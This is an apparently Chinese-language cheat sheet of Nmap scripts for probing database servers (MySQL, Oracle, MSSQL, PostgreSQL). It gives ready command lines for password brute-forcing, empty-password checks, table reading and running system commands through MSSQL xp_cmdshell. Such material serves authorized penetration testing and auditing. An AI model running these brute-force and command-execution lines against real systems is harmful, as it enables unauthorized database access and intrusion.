选项mysql-database

如下的例子:

nmap -p3306 --script mysql-database --script-args mysqluser=root,mysqlpass 192.168.2.21

其中,mysqluser指定目标数据库账号,mysqlpass指定目标数据库密码,如果密码为空则不填写任何东西。

选项mysql-variables

如下的例子:

nmap -p3306 --script=mysql-variables 192.168.21.2

选项mysql-empty-password

如下的例子:

nmap -p3306 --script=mysql-empty-password 192.168.21.3

该脚本用于检查MySQL是否有空密码,或者是密码为root

选项mysql-brute

如下的例子:

nmap --script=mysql-brute 192.168.23.1

该脚本用于MySQL弱口令,默认Nmap会扫描全部的端口用于查找MySQL端口,但是也可以用-p选项指定一个端口,也可以自定义账号密码字典。如下的例子:

nmap -p 3306 --script=mysql-brute userdb=passdb.txt passdb=pass.txt 192.168.23.1

选项mysql-audit

该脚本用于对MySQL安全配置进行审计。-p参数指定目标端口,如果无法确定端口,可以使用-sV选项进行扫描。

nmap -p 3306 --script mysql-audit --script-args "mysql-audit.username='root',\mysql-audit.password=' ',mysql-audit.filename='nselib/data/mysql-cis.audit'"

选项-oracle-brute

该脚本用来暴力破解Oracle密码。

nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=test 192.168.23.1

也可以自定义账号和密码字典。

nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=test --script-args userdb=/tmp/usernames.txt,passdb=/tmp/password.txt 192.168.23.1

选项ms-sql-brute

对sql server密码进行暴力破解

nmap -p 1433 --script ms-sql-brute --script-args userdb=name.txt,passdb=pass.txt 192.168.21.1

选项ms-sql-empty-password

检查sql server空密码,脚本默认账号为sa

nmap -p 1433 --script ms-sql-empty-password 192.168.23.1

选项ms-sql-tables

读取msSQL中的数据。

nmap -p 1433 --script ms-sql-tables --script-args mssql.username=sa,mssql.Password=sa 192.168.21.3

选项ms-sql-xp-cmdshell

借助msSQL执行系统命令

nmap -p 1433 --script ms-sql-xp-cmdshell --script-args mssql.username=sa,mssql.password=sa,ms-sql-xp-cmdshell.cmd="ipconfig" 192.168.32.1

使用该脚本,需要确保,目标服务器开放msSQL端口,并且知道连接账号和密码

选项pgsql-brute

暴力破解pgSQL数据库密码

nmap -p 5432 --script pgsql-brute 192.168.32.1
03-26 07:08